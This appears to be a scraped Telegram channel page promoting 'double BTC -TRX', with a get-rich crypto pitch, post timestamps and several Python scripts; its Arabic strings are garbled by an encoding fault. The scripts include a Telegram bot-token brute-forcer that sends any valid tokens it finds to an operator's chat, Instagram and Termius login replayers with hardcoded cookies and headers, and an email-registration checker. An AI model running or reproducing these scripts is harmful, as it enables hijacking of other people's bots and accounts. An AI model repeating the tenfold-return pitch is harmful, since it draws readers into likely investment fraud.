Are you looking to double your BTC and TRX cryptocurrency investments? Look no further than the 'double BTC -TRX' Telegram channel managed by the user 'djq_o'. This channel offers a unique opportunity for cryptocurrency enthusiasts to potentially multiply their investments by 10 times. With a combination of expert analysis, market insights, and timely updates, 'double BTC -TRX' provides members with valuable information to make informed decisions in the volatile world of cryptocurrency trading. Join today to take advantage of this exciting opportunity and watch your investments grow! Don't miss out on this chance to maximize your profits in the world of digital currency.
13 Jan, 17:45
13 Jan, 15:37
12 Jan, 17:17
12 Jan, 14:54
10 Jan, 23:57
09 Jan, 19:59
09 Jan, 11:25
08 Jan, 18:25
08 Jan, 18:25
08 Jan, 18:04
08 Jan, 17:54
07 Jan, 18:28
07 Jan, 18:27
07 Jan, 08:19
06 Jan, 07:27
05 Jan, 03:36
04 Jan, 07:28
01 Jan, 06:37
01 Jan, 06:30
30 Dec, 21:13
30 Dec, 16:25
30 Dec, 07:57
08 Dec, 05:42
06 Dec, 18:32
05 Dec, 20:03
05 Dec, 16:21
26 Nov, 02:32
25 Nov, 18:42
25 Nov, 14:51
25 Nov, 03:45
24 Nov, 21:17
import telebot
import requests
import json
from requests.utils import quote
class Bot:
def __init__(self,Token):
self.bot = telebot.TeleBot(Token,parse_mode="Markdown")
self.api = "http://tamtam.freewebhostmost.com/api_img.php"
self.SetUp()
def SetUp(self):
@self.bot.message_handler(commands=['start'])
def WelCome(msg):
self.Send(msg.chat.id,"*- ุงุฑุณู ูู ูุตู ุงูุตูุฑุฉ ..( ุจุงููุบุฉ ุงูุนุฑุจูู ุงูุถู ู ู ุงููุบุฉ ุงูุงููููุฒูุฉ) *")
@self.bot.message_handler(func=lambda msg:True)
def msg(msg):
c_id = msg.chat.id
txt = msg.text
img = self.Imge(txt)
if img:
self.SendPhoto(c_id,img)
else:
self.Send(c_id,"*ููุงู ู ู ูุงุถุญ ุนุฒูุฒู*")
def Send(self,c_id,txt):
self.bot.send_message(c_id,txt)
def SendPhoto(self,c_id,p_url):
self.bot.send_photo(c_id,p_url)
def Imge(self,prmpt):
Bobs = f"{self.api}?text={quote(prmpt)}"
response = requests.get(Bobs)
data = response.json()
if 'image_url' in data:
return data['image_url']
return None
def Run(self):
self.bot.polling()
Zaid = Bot("")#Your Token Here ..
Zaid.Run()
24 Nov, 14:57
21 Nov, 18:29
21 Nov, 18:25
21 Nov, 16:32
21 Nov, 14:57
from rich.progress import track
from rich.text import Text
from rich.panel import Panel
from rich.table import Table
from rich.console import Console
from rich import print, box
import random
import requests
main_bot_token = input("Bot Token | ")
target_chat_id = input("Chat ID | ")
console = Console()
r = requests.session()
def generate_token_list():
rr = "1234567890"
dd = "qQwWeErRtTyYUuiIoOpPaAsSDdfFgGhHjJkKlLzZXxCcVvBbNnMm1234567890-_"
b = ("2", "5")
bb = ("AAF", "AAG")
tokens = []
for _ in range(490):
prefix = random.choice(bb)
segment1 = random.choice(b)
segment2 = ''.join(random.choice(rr) for _ in range(9))
segment3 = ''.join(random.choice(dd) for _ in range(32))
token = f"{prefix}{segment1}{segment2}:{segment3}"
tokens.append(token)
return tokens
def send_valid_token(token, bot_id, bot_name, bot_username):
message = f"""
๐ฉ๐๐๐๐ ๐ง๐ข๐๐๐ก\n\n๐๐: {bot_id}\n๐ก๐๐ ๐: {bot_name}\n๐จ๐ฆ๐๐ฅ๐ก๐๐ ๐: {bot_username}\n๐ง๐ข๐๐๐ก: {token}
"""
requests.post(
f"https://api.telegram.org/bot{main_bot_token}/sendMessage",
data={"text": message, "chat_id": target_chat_id}
)
def check_tokens():
tokens = generate_token_list()
valid_tokens = 0
for token in track(tokens, description="[green]Checking tokens...[/green]"):
try:
url = f"https://api.telegram.org/bot{token}/getMe"
response = requests.get(url).json()
if response.get("ok"):
valid_tokens += 1
bot_info = response.get("result", {})
bot_id = str(bot_info.get("id"))
bot_name = bot_info.get("first_name", "N/A")
bot_username = bot_info.get("username", "N/A")
table = Table(title="Valid Token Found!", box=box.SQUARE)
table.add_column("ID", style="cyan")
table.add_column("Name", style="magenta")
table.add_column("Username", style="green")
table.add_column("Token", style="red")
table.add_row(bot_id, bot_name, bot_username, token)
console.print(table)
send_valid_token(token, bot_id, bot_name, bot_username)
else:
console.print(f"[bold red]Invalid Token:[/bold red] {token}")
except requests.exceptions.RequestException as e:
console.print(f"[bold red]Error:[/bold red] {str(e)}")
def display_signature():
panel_content = Text("DAKAR", justify="center", style="bold green")
panel = Panel(
panel_content,
title="Programming BY @z3_2q โข",
subtitle="Programming BY DAKARโข",
box=box.DOUBLE,
style="magenta"
)
console.print(panel)
if __name__ == "__main__":
display_signature()
check_tokens()
21 Nov, 13:25
21 Nov, 01:42
21 Nov, 00:32
20 Nov, 19:14
20 Nov, 17:40
20 Nov, 15:52
18 Nov, 07:55
18 Nov, 06:05
15 Nov, 20:33
15 Nov, 19:44
15 Nov, 17:06
15 Nov, 16:38
15 Nov, 03:14
14 Nov, 21:25
14 Nov, 21:18
14 Nov, 20:38
14 Nov, 19:42
14 Nov, 16:43
14 Nov, 14:40
13 Nov, 09:34
13 Nov, 05:52
12 Nov, 19:04
12 Nov, 17:52
12 Nov, 17:41
12 Nov, 17:27
12 Nov, 17:19
07 Nov, 18:00
07 Nov, 13:49
07 Nov, 13:09
06 Nov, 18:28
06 Nov, 14:26
06 Nov, 12:32
import requests
ewq = input(' enter email :')
ff = input('enter Password : ')
cookies = {
'csrftoken': '6ZOVwVqaCS0MNR1ozgXSmu',
'datr': 'PmArZ_TYUAQxN21TlKpw5HkB',
'ig_did': '69D48968-02BE-4BFF-A9CE-8DE5B358FAEF',
'dpr': '2',
'mid': 'ZytgRwABAAGzDh4lE94_ULxbg3u4',
'ig_nrcb': '1',
'wd': '360x338',
}
headers = {
'authority': 'www.instagram.com',
'accept': '*/*',
'accept-language': 'ar-EG,ar;q=0.9,en-US;q=0.8,en;q=0.7',
'content-type': 'application/x-www-form-urlencoded',
# 'cookie': 'csrftoken=6ZOVwVqaCS0MNR1ozgXSmu; datr=PmArZ_TYUAQxN21TlKpw5HkB; ig_did=69D48968-02BE-4BFF-A9CE-8DE5B358FAEF; dpr=2; mid=ZytgRwABAAGzDh4lE94_ULxbg3u4; ig_nrcb=1; wd=360x338',
'origin': 'https://www.instagram.com',
'referer': 'https://www.instagram.com/accounts/login/',
'sec-ch-prefers-color-scheme': 'dark',
'sec-ch-ua': '"Not-A.Brand";v="99", "Chromium";v="124"',
'sec-ch-ua-full-version-list': '"Not-A.Brand";v="99.0.0.0", "Chromium";v="124.0.6327.4"',
'sec-ch-ua-mobile': '?1',
'sec-ch-ua-model': '"CPH2239"',
'sec-ch-ua-platform': '"Android"',
'sec-ch-ua-platform-version': '"11.0.0"',
'sec-fetch-dest': 'empty',
'sec-fetch-mode': 'cors',
'sec-fetch-site': 'same-origin',
'user-agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Mobile Safari/537.36',
'x-asbd-id': '129477',
'x-csrftoken': '6ZOVwVqaCS0MNR1ozgXSmu',
'x-ig-app-id': '1217981644879628',
'x-ig-www-claim': '0',
'x-instagram-ajax': '1017977479',
'x-requested-with': 'XMLHttpRequest',
'x-web-device-id': '69D48968-02BE-4BFF-A9CE-8DE5B358FAEF',
}
data = {
'enc_password': ff,
'caaF2DebugGroup': '0',
'loginAttemptSubmissionCount': '0',
'optIntoOneTap': 'false',
'queryParams': '{}',
'trustedDeviceRecords': '{}',
'username': ewq,
}
response = requests.post('https://www.instagram.com/api/v1/web/accounts/login/ajax/', cookies=cookies, headers=headers, data=data)
print(response.text)
06 Nov, 11:08
06 Nov, 11:05
05 Nov, 20:19
05 Nov, 20:07
05 Nov, 16:32
05 Nov, 16:05
30 Oct, 10:07
import requests;import json;import hashlib;from uuid import uuid4;email = input("Enter Your Email : ");pas = input("Enter Your Pas : ");url = "https://api.termius.com/api/v3.3/auth/device/login/";payload = json.dumps({
"email": "[email protected]",
"password": hashlib.sha256(pas.encode()).hexdigest(),
"device": {
"name": "Redmi Redmi Note 8 Pro",
"sub_name": "begonia",
"token": str(uuid4()),
"mobile_type": "Google",
"os_version": "11",
"app_version": "6.3.9",
"is_active": True
}});headers = {
'User-Agent': "okhttp/4.8.1",
'Accept-Encoding': "gzip",
'x-device-app-version': "6.3.9",
'x-device-platform': "Google",
'content-type': "application/json; charset=utf-8"
};response = requests.post(url, data=payload, headers=headers);print(response.text)
import requests;import json;url = "https://api.termius.com/api/v4.1/auth/email/availability/";url2 = "https://api.termius.com/api/v4.1/auth/sso/domain/check_email/";payload = json.dumps({"email": "[email protected]"});headers = {
'User-Agent': "okhttp/4.8.1",
'Accept-Encoding': "gzip",
'x-device-app-version': "6.3.9",
'x-device-platform': "Google",
'content-type': "application/json; charset=utf-8"};response = requests.post(url, data=payload, headers=headers);response2 = requests.post(url2, data=payload, headers=headers);print(response.text);print(response2.text)
29 Oct, 19:02
value = input("Enter Any Value: ")
try:
value = int(value)
except ValueError:
pass
def Hexx(value):
if isinstance(value, int):
HexApp = hex(value)[2:]
elif isinstance(value, str):
HexApp = ''.join(format(ord(char), '02x') for char in value)
else:
raise ValueError("ุงูุฑุฌุงุก ุฅุฏุฎุงู ููู ุฉ ุฑูู ูุฉ ุฃู ูุตูุฉ ููุท.")
return HexApp.upper()
print(Hexx(value))
28 Oct, 16:23
28 Oct, 11:12
28 Oct, 05:16